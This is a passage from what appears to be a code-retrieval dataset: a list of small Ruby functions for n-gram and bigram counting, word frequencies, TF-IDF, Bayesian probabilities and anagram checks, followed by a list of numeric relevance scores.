"def calculate_frequencies(target_file)\n\tn_char=0.0\n\n\n\ttext=File.read(target_file)\n\n\t#creo l'hash delle lettere\n\thsh=Hash.new\n\tcode=97\n\twhile code<=122 do\n\t\thsh[code]=Occurrences.new(0,0.000)\n\t\tcode+=1\n\tend\n\t#conto le occorrenze delle lettere\n\ttext.each_byte {|c|\n\t\tif c>=97 and c<=122;\n\t\t\thsh[c].number+=1\n\t\t\tn_char+=1\n\t\tend\n\t}\n\t#creo le frequenze\n\thsh.each {|k, v|\n\t\tv[1]=v[0]/n_char\n\t\t#puts\"number:#{v[0]} - percentage:#{v[1]}\"\n\t}\n\t#print dei valori creati\n\t#i=0\n\t#hsh.each {|k, v| puts \"elemento #{i} ---> #{k} is #{v}\",\n\t#\ti+=1\n\t#}\n\treturn hsh;\nend",
"def probabilities\n Hash[ BayesCategory.all.to_a.collect { |word|\n [word.category, probability(word.category)]\n }]\n end",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def weight; end",
"def calculate_mle_probability next_ngram: nil, ngram_model: 0, separator: \" \", mode: :single\n raise ('MLE: ngram_model must be set explicitly in sentence mode') if (ngram_model==0 and mode == :sentence)\n\n local_ngram_model=ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n if mode==:single\n rc=get_raw_counts(next_ngram,local_ngram_model)\n return rc.to_f/@good_turing_bins[ngram_model][0] # this is where we keep V\n elsif mode==:sentence\n return next_ngram.split(separator).each_cons(local_ngram_model).reduce(1) {|acc, word| (@ngram_counts[local_ngram_model][word.join(\" \")].to_f/@good_turing_bins[local_ngram_model][0].to_f)*acc}\n else\n raise ('MLE: unknown mode [available modes are :single and :sentence]') if (mode != :single and mode != :sentence)\n end\n end",
"def document_frequency\n @corpus.each_with_object({}) do |doc, df|\n doc.bag_of_words.keys.each do |word|\n df[word] = (df.fetch(word) { 0.0 }) + 1.0\n end\n end\n end",
"def percent_of_word(word)\n @total_count = SubWordJoin.where(word: word).count\n puts @total_count\n sub_count = 0\n @sub = SubDriver.where(driver: self)\n @sub.each do |sub|\n sub_count += SubWordJoin.where(word: word, sub_driver: sub).count\n end\n\n percent = (sub_count.to_f/@total_count)*100\n return percent.round(2)\n\n end",
"def get_weighted_word(dictionary, sample_space)\n sample_point = Random.rand(sample_space)\n i = 0\n str = \"\"\n dictionary.each_pair do |freq, words|\n words.each do |word|\n i += freq\n str = word\n return word if (i > sample_point)\n end\n end\n str\nend",
"def calculate_probability(useful_results, reroll_count)\n return 100.0 * useful_results / ( 6 ** reroll_count )\n end",
"def cond_probs polarity\n raise \"Invalid polarity\" unless [:pos, :neg].include? polarity\n\n # Divide the number of reviews each word occurs in by the total number of\n # reviews for that polarity\n count = @features[polarity].count.to_f\n (0..7).map { |i| @features[polarity].count { |f| f[i] } / count }\n end",
"def probability_token_in_label(label, token)\n (@data[label][token] || 0).to_f / @doc_counts[label].to_f\n end",
"def bakers_percent weight\n weight / bakers_percent_100.to_f\n end",
"def test_approach\n prefix = \"This pangram tallies \"\n solution = \"This pangram tallies five a's, one b, one c, two d's, twenty-eight e's, eight f's, six g's, eight h's, thirteen i's, one j, one k, three l's, two m's, eighteen n's, fifteen o's, two p's, one q, seven r's, twenty-five s's, twenty-two t's, four u's, four v's, nine w's, two x's, four y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n\n prefix = \"This terribly inefficient pangram contains \"\n solution = \"This terribly inefficient pangram contains five a's, two b's, three c's, two d's, thirty-one e's, six f's, four g's, ten h's, sixteen i's, one j, one k, three l's, two m's, twenty n's, thirteen o's, two p's, one q, twelve r's, twenty-eight s's, twenty-eight t's, three u's, three v's, nine w's, four x's, six y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n end",
"def mcw(input) #Debug assistance once again provided by George\n\n\tif ($bigrams[input]!=nil)\n\t\t\twordList = $bigrams[input].keys #Grabs all the keys from bigrams and adds them to wordList\n \tcurrentMCW = $bigrams[input].keys[0]#inits the most common one to the first occurance\n \ttotalWords = wordList.length #total number of words in the bigram\n \tx = 1 #simply a counter variable\n \twhile(x < totalWords) #iterates through each word in the key\n wordCheck = $bigrams[input].keys[x]\n if($bigrams[input][currentMCW]<$bigrams[input][wordCheck]) #checks to see if the frequency for the word we are checking is greater than our current MCW's frequency\n currentMCW = wordCheck #If it's frequency is greater than the current MCW's then it sets the newly found word to be the MCW\n end\n x+= 1\n \tend\n\t\t\tif (currentMCW!=nil)\n\t\t\t\treturn currentMCW\n\t\t\tend\n\t\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\tsong = cleanup_title(line)\n\n\t\t\tif not song.nil? and song =~ /^[\\d\\w\\s']+$/\n\t\t\t\tsong = song.downcase\n\t\t\t\tsong.gsub!(/ {2}/, \" \")\n\t\t\t\tsong = remove_stop_words(song)\n\t\t\t\twords = song.split(\" \");\n\n\t\t\t\tupdate_bigram_counts(words)\n\t\t\tend\n\t\tend\n\n\t\tputs \"Finished. Bigram model built.\\n\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def score\n documented = @files.inject(0) {|sum, file| sum += file.total_documented }\n total = @files.inject(0) {|sum, file| sum += file.total_entities }\n ((documented.to_f / total) * 100).to_i\n end",
"def compute_weights\n @weight = Hash.new\n \n @terms.each do |term|\n @doc_list.values.each do |doc|\n value = doc.freq_rel(term) * @idf[term]\n @weight[[term,doc]] = value\n\n assert { value >= 0 }\n end\n end\n end",
"def word_count\n weighted(:count, :word).to_i\n end",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def calculate_match_probability\n # two heuristics: \n # 1 is are their multiple words in term_text? if so, mark as probable\n # if not, does it match the anchor regexp? if so, mark as probable\n # else, mark as improbable\n \n # multiple words?\n anchor_regexp = \"(featuring|plus|the|presents|with|plus|and|\\,|\\&|[()]|\\/|\\:|\\-|^|$)\"\n nix_regexp = \"parking|\\svs\\.?\\s\" \n if artist_name=~/#{nix_regexp}/i\n self.match_probability=\"unlikely\"\n return nil\n end\n text=term_text.strip\n if text[\" \"]\n self.match_probability=\"likely\"\n return \"multpl\"\n end\n if artist_name=~/#{anchor_regexp}\\s*#{text}\\s*#{anchor_regexp}/i\n self.match_probability=\"likely\"\n return \"regexp\"\n end\n# if artist_name=~/#{anchor_regexp}\\s+?#{text}\\s+?#{anchor_regexp}/i\n# match_probability=\"likely\"\n# return \"regexp\"\n# end\n self.match_probability=\"unlikely\"\n return nil\n end",
"def text_commonality(text)\n probability_of_ngrams(common_ngrams_from_text(text))\n end",
"def good_word(wordlist)\n # letter frequency\n freqs = Hash.new { |h,k| h[k] = 0 }\n wordlist.each do |w|\n w.chars.each { |c| freqs[c] += 1 }\n end\n\n # score = number of unique chars X sum of letter frequencies\n wordlist.max_by do |w|\n chars = w.chars.to_a.uniq\n chars.length * chars.map{|c| freqs[c]}.inject{|sum,n| sum + n}\n end\nend",
"def compute_weights\n\t\t@weight = Hash.new\n\t\t\n\t\t@terms.each do |term|\n\t\t\t@doc_list.values.each do |doc|\n\t\t\t\tvalue = doc.freq_rel(term) * @idf[term]\n\t\t\t\t@weight[[term,doc]] = value\n\n\t\t\t\tassert { value >= 0 }\n\t\t\tend\n\t\tend\n\tend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def calculate_probability(key)\n\n\t\tk = key\n\n\t\tcase k\n\t\twhen 2\n\t\t\treturn TWO_TWELVE\n\t\twhen 3\n\t\t\treturn THREE_ELEVEN\n\t\twhen 4\n\t\t\treturn FOUR_TEN\n\t\twhen 5\n\t\t\treturn FIVE_NINE\n\t\twhen 6\n\t\t\treturn SIX_EIGHT\n\t\twhen 7\n\t\t\treturn SEVEN\n\t\twhen 8\n\t\t\treturn SIX_EIGHT\n\t\twhen 9\n\t\t\treturn FIVE_NINE\n\t\twhen 10\n\t\t\treturn FOUR_TEN\n\t\twhen 11\n\t\t\treturn THREE_ELEVEN\n\t\twhen 12\n\t\t\treturn TWO_TWELVE\n\t\telse\n\t\t\treturn 0\n\t\tend\n\tend",
"def grams\n gram_equivalent / amount\n end",
"def probability_token_is_label(token, label, prob_label)\n token_count = token_count(token)\n prob_token = token_count / @doc_counts.values.reduce(:+).to_f\n return nil if prob_token == 0.0\n\n prob_token_in_label = probability_token_in_label(label, token)\n (prob_token_in_label * prob_label) / prob_token\n end",
"def inverse_document_frequency(term)\n df = @model.document_count(term)\n if @function == :bm25\n log((documents.size - df + 0.5) / (df + 0.5))\n else\n 1 + log(documents.size / (df + 1.0))\n end\n end",
"def calculate\n document_frequency.each_with_object({}) do |(word, freq), idf|\n idf[word] = Math.log(@corpus.size/freq)\n end\n end",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def calc_score(word_list, total_freq, weight)\n hash = Hash.new{}\n word_list.each{|w|\n s = (weight * working_dictionary[w]/(total_freq)*100).round(4)\n hash[w] = s \n }\n hash = hash.sort_by{|k,v| -v} \n hash = Hash[*hash.flatten]\n return hash\n end",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def to_grams wt\n return nil if wt.nil? or wt.length ==2\n return (wt[0]*1000+wt[1]+wt[2]/1000)\n end"
] | [
"0.76515126",
"0.714055",
"0.71191",
"0.6721609",
"0.6526299",
"0.6516771",
"0.63884306",
"0.63025784",
"0.61543596",
"0.61466616",
"0.60794854",
"0.6042595",
"0.59742594",
"0.5968507",
"0.5966927",
"0.5937904",
"0.5923168",
"0.5881117",
"0.5872214",
"0.58579516",
"0.5833358",
"0.58320016",
"0.58086807",
"0.57817966",
"0.57735896",
"0.575285",
"0.5708535",
"0.5704657",
"0.56648153",
"0.56529254",
"0.56288075",
"0.5594873",
"0.55847514",
"0.55716515",
"0.55629563",
"0.5543413",
"0.5536579",
"0.5532721",
"0.5529829",
"0.5501212",
"0.5497496",
"0.5491172",
"0.5489733",
"0.5481049",
"0.54710984",
"0.5463989",
"0.5443687",
"0.5442721",
"0.543354",
"0.54334503",
"0.54292566",
"0.54210407",
"0.5418359",
"0.5411163",
"0.5408126",
"0.5401261",
"0.5396001",
"0.53441364",
"0.5329309",
"0.5325446",
"0.5324593",
"0.53220123",
"0.5316679",
"0.5310136",
"0.5299031",
"0.5294788",
"0.5277856",
"0.5268478",
"0.5267041",
"0.52605915",
"0.5259067",
"0.52563936",
"0.52536803",
"0.52484053",
"0.52471393",
"0.52346325",
"0.52290094",
"0.52262163",
"0.5223689",
"0.52132434",
"0.5209546",
"0.51886404",
"0.5187168",
"0.51622534",
"0.5140699",
"0.514063",
"0.513402",
"0.51332164",
"0.5129691",
"0.5124415",
"0.5122632",
"0.51138204",
"0.5110224",
"0.51101124",
"0.5109741",
"0.509579",
"0.5095129",
"0.50934917",
"0.5089099",
"0.50867593"
] | 0.5987286 | 12 |
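A side note on the counting idiom that recurs throughout the negatives above (`trigram_count`, the `most_frequent_bigram` variants, `ngram_analysis`): a Hash built with a default value of 0, filled over a sliding window of tokens. The sketch below is illustrative only and belongs to none of the snippets; the method name `ngram_counts` and its parameters are assumptions.

# Count n-grams with a zero-defaulting Hash over a sliding window.
def ngram_counts(tokens, n)
  counts = Hash.new(0)              # missing keys read as 0
  tokens.each_cons(n) do |gram|     # sliding window of size n
    counts[gram.join(" ")] += 1
  end
  counts
end

# Example: the most frequent bigram in a short title.
counts = ngram_counts("love me do love me".split, 2)
puts counts.max_by { |_gram, c| c }.first   # => "love me"

`each_cons` does the windowing that several snippets above reimplement with index arithmetic, and the `Hash.new(0)` default removes the key?-then-initialize branching seen in `ngram_analysis`.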
Get a bigram given both words. | def get(word1, word2)
@table[[word1,word2]]
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def bigramate(word)\n (0..(word.length - 2)).map { |i| word.slice(i, 2) }\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def compare(word1, word2)\n bigram_compare(bigramate(word1), bigramate(word2))\n end",
"def find_bigrams(str, bigrams)\n bigrams.select { |bigram| str.include?(bigram)}\nend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def scramble(str1, str2)\n str2.chars.all? { |letter| str1.include?(letter) }\nend",
"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def scramble_words(words)\n words.split(' ').map { |word| scramble(word) }.join(' ')\nend",
"def scramble(str1, str2)\n found_letters = ''\n str2.chars.each do |letter|\n next unless str1.include?(letter)\n str1.sub!(/#{letter}/, '')\n found_letters << letter\n end\n found_letters == str2\nend",
"def anagrams?(word1, word2)\n if word1.length != word2.length\n return false\n end\n word1.each_char do |ele|\n if !word2.include?(ele)\n return false\n end\n end\n return true\nend",
"def antigram?\n (@first.downcase.gsub(/[^a-z0-9\\s]/i, '').split(\"\") & @second.downcase.gsub(/[^a-z0-9\\s]/i, '').split(\"\")).empty?\n end",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def anagrams(str1, str2)\n \nend",
"def anagrams(word1, word2)\n length = word1.length\n if word1.length == word2.length\n array = []\n while length>=0\n array.push(word1[length-1])\n length -= 1\n end\n length2 = word2.length\n while length2 >= 0\n if array.include?(word2[length2 - 1])\n length2 -= 1\n else\n return false\n end\n end\n return true\n else\n return false\n end\nend",
"def longest_bigram(str)\n\tbigram_hash = Hash.new\n bigram_str = str.split(\" \")\n bigram_str.each_with_index do |word, i|\n if i == bigram_str.length - 1\n next\n else\n bigram_hash[word + \" \" + bigram_str[i + 1]] = (word + \" \" + bigram_str[i + 1]).length\n end\n end\n temp_str = \"\"\n temp_str_length = 0\n bigram_hash.keys.each do |compound|\n if compound.length > temp_str_length\n temp_str = compound\n temp_str_length = compound.length\n end\n end\n p temp_str\nend",
"def get_bigrams(string)\n s = string.downcase\n v = []\n (s.length-1).times{ |i|\n v[i] = s[i...i+2]\n }\n return v\n end",
"def anagrams(word, words)\n word = word.chars.sort\n words.select{|x| x.chars.sort == word}\nend",
"def scramble_words(words)\n words.split.map do |word|\n scramble_word(word)\n end.join(' ')\nend",
"def use_bigram(str,i)\n\t\tmax=@han[str[i]][0]\n\t\tif i==0\n\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(\"$\"+h)>ref(\"$\"+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\telse\n\t\t\t\t@han[str[i]].each{|h|\n\t\t\t\tif ref(str[i-1]+h)>ref(str[i-1]+max)\n\t\t\t\t\tmax=h\n\t\t\t\tend\n\n\t\t\t}\n\t\tend\n\t\treturn max\n\n\tend",
"def scramble(s1,s2)\n pile_of_letters = s1.chars\n target_letters = s2.chars\n target_letters.uniq.all? { |letter| pile_of_letters.count(letter) >= target_letters.count(letter) }\nend",
"def combine_anagrams(words)\r\n\t\r\n\tresult = []\r\n\twords1 = [];\r\n\twords.each {|w| words1 << w.to_s.downcase.chars.sort.join}\r\n\twords2 = words1.uniq\r\n\t\r\n\tfor i in 0 ... words2.size\r\n\t\tr = []\r\n\t\tw2 = words2[i]\r\n\t\tfor j in 0 ... words.size\r\n\t\t\tw = words[j]\r\n\t\t\tif w2.casecmp(w.to_s.downcase.chars.sort.join) == 0\r\n\t\t\t\tr << w\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult << r\r\n\tend\r\n\t\r\n\treturn result\r\n\t\r\nend",
"def matching_bigrams(word1)\n list = @index[word1]\n list.map{ |word2| @table[[word1,word2]] }\n end",
"def scramble(str1, str2)\n str2.chars.all? do |char|\n str1.count(char) >= str2.count(char)\n end\nend",
"def scramble(s1,s2)\n s2.chars.all? { |c| s1.sub!(c, '') }\nend",
"def scramble(s1, s2)\n # p s1.chars.include?(s2)\n p s2.chars.uniq.all?{ |letter| s2.count(letter) <= s1.count(letter) }\nend",
"def anagrams(word, words)\n words.select { |w| w.chars.sort == word.chars.sort }\nend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def isAntigram(comparedWord)\n String.chars.each(comparedWord)\n end",
"def scramble_words(words)\n first_word = words[0]\n last_word = words[-1]\n alphabetically = words[1, (words.size - 2)].chars.sort\n alphabetically.unshift(first_word).push(last_word).join\nend",
"def anagrams_oneliner(string)\n string.chars.to_a.permutation.map(&:join).select {|value| value != string and WORDS.include? value}\nend",
"def good_bigram?(word)\n return false if REJECT_BIGRAMS.include?(word)\n return false if word.size < 2\n true\n end",
"def mcw(word)\n\tif $bigrams.has_key? word\n\t\tmax = 0\n\t\tkeys = []\n\t\t$bigrams[word].each do |key, count|\n\t\t\tif count > max\n\t\t\t\tkeys = [key]\n\t\t\t\tmax = count\n\t\t\telsif count == max\n\t\t\t\tkeys << key\n\t\t\tend\n\t\tend\n\n\t\tif keys.length > 1\n\t\t\treturn keys[Random.rand(keys.length)]\n\t\telse\n\t\t\treturn keys[0]\n\t\tend\n\tend\n\treturn \"\"\nend",
"def search_for (word)\n\n chars = word.split(\"\")\n all_words = chars.permutation(chars.size).map{|_chars|\n _chars.join \"\"\n }\n\n anagrams = []\n all_words.each do |w|\n anagrams.push w if @word_list[w]\n end\n\n return anagrams\n end",
"def are_anagrams(firstword, secondword)\n firstword.downcase.split(\"\").sort.join == secondword.downcase.split(\"\").sort.join\nend",
"def combine_anagrams(words) \r\n anagrams = words.inject(Hash.new()) do |r, word|\r\n key = word.downcase.chars.sort.join\r\n r[key] ||=[]\r\n r[key] << word\r\n r\r\n end\r\n anagrams.values\r\nend",
"def mcw(search)\n\t\tif !$bigrams.has_key?(search) # if the search word doesn't exist in the bigram...\n\t\t\tmost_common = nil # we're going to return nil.\n\n\t\telse most_common = $bigrams[search].max_by{|word, number| number}[0] # search for max by # of maxes\n\t\tend\n\n\t\treturn most_common\nend",
"def word_unscrambler(str, words)\n str = str.split('').sort.join('')\n possible = []\n words.map do |word|\n sort_word = word.split('').sort.join('')\n possible << word if word_c == str\n end\n return possible\nend",
"def combine_anagrams(words)\n words_uniq = words.map{ |w| w.downcase.split(//).sort.join }.uniq\n words_uniq.map{ |wu| words.select{ |w| w.downcase.split(//).sort.join == wu }}\nend",
"def combine_anagrams(words)\n result = []\n words.each do |word|\n anagrams = words.find_all{|item| item.downcase.chars.sort.join == word.downcase.chars.sort.join }\n result.push(anagrams)\n end\n result.uniq\nend",
"def most_frequent_bigram(str)\n bigram = Hash.new(0)\n (0...str.length).each { |index| bigram[str[index..index+1]] += 1 }\n bigram.key(bigram.values.max)\nend",
"def StringScramble(str1,str2)\n x = str1.chars.sort.join\n y = str2.chars.sort.join\n if x.include?(y)\n \t return true\n else\n return false\n end \nend",
"def scramble(s1,s2)\n s2.chars.uniq.all?{|i| s1.count(i) >= s2.count(i)} \nend",
"def scramble(st1, st2)\n st1_arr = st1.chars\n st2_arr = st2.chars\n st2_arr.all? { |char| st1_arr.count(char) >= st2.count(char) }\nend",
"def most_frequent_bigram(str)\n new_array =[]\n new_arr = []\n hash = {}\n hash = Hash.new {|k, v| hash[k] = 0}\n new_str = str.split(\"\")\n (0...new_str.length).each do |i0|\n (i0...new_str.length).each do |iz|\n pair = new_str[i0..iz]\n new_array << pair\n end\n end\n\n new_array.each do |combined|\n if combined.length == 2\n new_arr << combined \n end\n end\n \n new_arr.each do |pairs| \n hash[pairs] += 1\n end\n \n hash.each {|k, v| return k.join(\"\") if v == hash.values.max}\n\n \nend",
"def combine_anagrams(words)\n result = Array.new\n words.each do |i|\n anagrams = Array.new\n sorted = i.downcase.chars.sort.join\n words.each do |j|\n if j.downcase.chars.sort.join == sorted\n anagrams << j\n end\n end\n result << anagrams\n end\n return result.uniq\nend",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def word_unscrambler(str, words)\n return words.keep_if {|word| word.chars.sort == str.chars.sort}\nend",
"def most_frequent_bigram(str)\n#grab substrings of length 2\n#hash that contains the substring\n#return key with max value \n\n bigrams = Hash.new(0)\n str.each_char.with_index do |char, i|\n bigrams[str[i..i+1]] += 1 if i + 1 < str.length\n end\n bigrams.max_by { |k,v| v }.first\nend",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def combine_anagrams(words)\n final = []\n first_word = ''\n b = ''\n words.each_with_index do |word_a, i|\n first_word = word_a.downcase.split('').sort\n final << [word_a]\n words.each_with_index do |word_b, j|\n if word_a == word_b\n else\n if first_word == word_b.downcase.split('').sort\n final[i] << word_b\n words.delete(word_b)\n else\n end\n end\n end\n end\n return final\nend",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigram_hash[str[i..i+1]] += 1\n i += 1\n end\n\n bigram_hash.max_by {|k, v| v}[0]\nend",
"def anagrams?(word1, word2)\n\nend",
"def anagrams?(word1, word2)\n\nend",
"def most_frequent_bigram(str)\n bigram_count = Hash.new(0)\n\n # count each bigram appearance\n (0...str.length - 1).each do |i|\n bigram = str[i] + str[i+1]\n bigram_count[bigram] += 1\n end\n\n # return most frequent bigram\n bigram_count.max_by { |k, v| v }.first\nend",
"def first_anagram?(word1, word2)\n anagrams = []\n arr = word1.chars \n\n arr.permutation.each do |subArr|\n anagrams << subArr.join(\"\")\n end \n p anagram?(anagrams, word2) \nend",
"def combine_anagrams(words)\n words.group_by {|w| w.downcase.chars.sort {|a,b| a <=> b}.to_s}.values\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def scramble(s1,s2)\n s2.chars.uniq.each { |letter| return false unless s1.count(letter) >= s2.count(letter) }\n true\nend",
"def anagrams(word, words)\n p words.select {|x| x.chars.sort == word.chars.sort }\nend",
"def antigrams?\n chars1 = @input1.downcase.gsub(/[!@#$%^&*()-=_+|;':\",.<>?']/, '').split(\"\").sort\n chars2 = @input2.downcase.gsub(/[!@#$%^&*()-=_+|;':\",.<>?']/, '').split(\"\").sort\n if\n chars1.any? {|chars1| chars2.include?(chars1)}\n return false\n else\n return true\n end\n end",
"def combine_anagrams(words)\n anagrams = Hash.new()\n words.each do |word|\n letters = word.downcase.gsub(/[^a-z]/, \"\").split(\"\").sort.join\n anagrams[letters] = Array.new unless anagrams.include?(letters)\n anagrams[letters] << word\n end\n anagrams.values\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def anagrams?(word1, word2)\n return char_count(word1) == char_count(word2)\nend",
"def string_scramble(str1, str2)\r\n str2.chars.all? { |x| str1.count(x) >= str2.count(x) }\r\nend",
"def most_frequent_bigram(str)\n pairs = Hash.new(0)\n str.each_char.with_index do |letter, indx|\n if indx != str.length-1\n pair = letter + str[indx+1]\n end\n pairs[pair] += 1\n end\n pairs.key(pairs.values.max)\nend",
